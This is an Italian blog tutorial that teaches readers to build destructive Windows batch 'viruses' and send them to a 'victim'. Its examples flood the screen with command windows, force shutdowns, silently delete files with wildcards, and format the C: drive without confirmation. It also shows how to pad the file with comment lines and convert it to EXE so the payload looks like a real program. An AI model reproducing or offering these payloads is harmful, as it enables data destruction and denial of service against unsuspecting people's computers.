Divertirsi a creare piccoli virus in Bath
- Dettagli
- Categoria: Vari
- Pubblicato Sabato, 18 Maggio 2013 16:58
- Scritto da Althorex
Questa sezione è espressamente fatta per chi vuole cimentarsi a creare piccoli "virus" in batch.
Per iniziare facciamo un pò di storia, bisogna sapere cos'è per poterlo usare:
Il termine batch (letteralmente: infornata) viene usato per indicare un particolare modo di gestire le operazioni di un sistema di calcolo. In sostanza significa che tutta la sequenza di operazioni e dati necessari per svolgere un particolare compito vengono preparati in anticipo e memorizzati su un adeguato supporto creando una procedura. La procedura viene poi eseguita dal sistema come un blocco unico, cioè senza che sia necessario, o possibile, un intervento umano prima che sia terminata. Il termine è contrapposto alla modalità interattiva, che si ha quando l'utilizzatore accede direttamente ad un terminale o ad una interfaccia dell'elaboratore e segue passo passo le varie fasi dell'operazione.
Nei primi sistemi di calcolo la modalità batch era l'unica disponibile: l'utilizzatore preparava in anticipo un "pacco" di schede perforate che contenevano le istruzioni per il sistema operativo, il codice del programma ed i dati di ingresso. Il pacco di schede veniva poi consegnato ad un operatore che provvedeva ad inserirlo in una coda di esecuzione. Il risultato era costituito normalmente da una stampa che veniva riconsegnata all'utilizzatore al termine del lavoro.
La modalità batch aveva il vantaggio di consentire un uso continuativo del sistema di calcolo, dato che si faceva in modo che nella coda di esecuzione ci fossero sempre procedure in attesa di essere eseguite, ed inoltre una gestione di questo tipo non richiede sistemi operativi particolarmente complessi. Ciò era particolarmente importante dato che gli elaboratori da un lato disponevano di risorse (velocità e memoria) assai limitate e, dall'altro, avevano costi di acquisto e gestione elevatissimi.
Anche oggi vengono utilizzate procedure predisposte in anticipo ed eseguite con modalità batch (ad esempio per svolgere operazioni periodiche), ma vengono più comunemente chiamate procedure o scripts, anche se una traccia del termine "batch" rimane nel nome dei files che contengono sequenze di comandi nei sistemi Windows e che terminano infatti con l'estensione BAT.
In poche parole è un file che si crea col documento di testo e che esegue uno specifico comando dos:
sul desktop clickate destro, fate nuovo documento di testo, aprite il documento di testo e scrivete dentro un comando, dopodichè salvate e rinominate il file in estensione .bat
Esempio:
shutdown /s /t 10 /c "Ciao Ciao"
Vi apparirà sul desktop una finestra di avviso e il computer si spegnerà dopo 10 secondi salutandovi.
Lo si può definire come un file eseguibile, un file che termina con l'estensione .bat ha la possibilita di essere eseguito, prorpio come gli .exe
Iniziamo con qualcosa di semplice:
1) comando per far aprire 3 finestre di msdos
START
START
START
Risultato = aprirà 3 msdos (Start--->Esegui--->cmd), sembra nulla ma pensate se invece di 3 volte lo scriveste per 1000 e lo mandate alla "vittima"... beh, vi lascio immaginare, oltre al riempimento del desktop con le finestre msdos si ha anche un rallentamento del pc, il consiglio è spegnere e riavviare.
2) comando per spegnere, riavviare o disconnettere
shutdown
seguito da uno o più di questi comandi:
a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte
Esempio: shutdown /s
3) Comando per eliminare file
Per creare un virus che cancellerà un file specifico, inserite nel blocco note UNO dei seguenti codici:
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"
1) @ERASE e @DEL = Sono i comandi per cancellare il file
2) /comando = Da sostituire con i comandi sottostanti:
a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.
3) *.* = Il primo asterisco serve per cancellare TUTTI i file con un certo nome.
4) *.* = Il secondo asterisco serve per cancellare QUALSIASI file con una determinata estensione (Esempio: *.txtcancellerà tutti i file di estensione .txt)
Praticamente, se vogliamo eliminare il file esempio.txt da C:\ dobbiamo utilizzare il codice:
@ERASE /S /Q "C:\esempio.txt"
4) Comando per formattare C:
format C: /autotest /q /u
Risultato:
Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)
Fatto il "virus" bisogna aumentarne il peso, cioè aumentare i Kb del nostro file.
Per avere tale risultato usiamo il comando @REM, che serve per "Inserire Commenti", ma se noi al posto dei commenti mettiamo 500 volte la lettera "a", non faremo altro che aumentare il peso del virus. Perchè??? Perchè chiunque con un minimo di intelligenza può immaginare che un file batch o un file eseguibile non può pesare 2KB!!
CODICE:
@REM tante__parole=più-peso-del-file
Ora dobbiamo trasformare il nostro file Batch in EXE, per far ciò possiamo usare un programmino che trovate nella sezione download, Bat_To_Exe_Converter.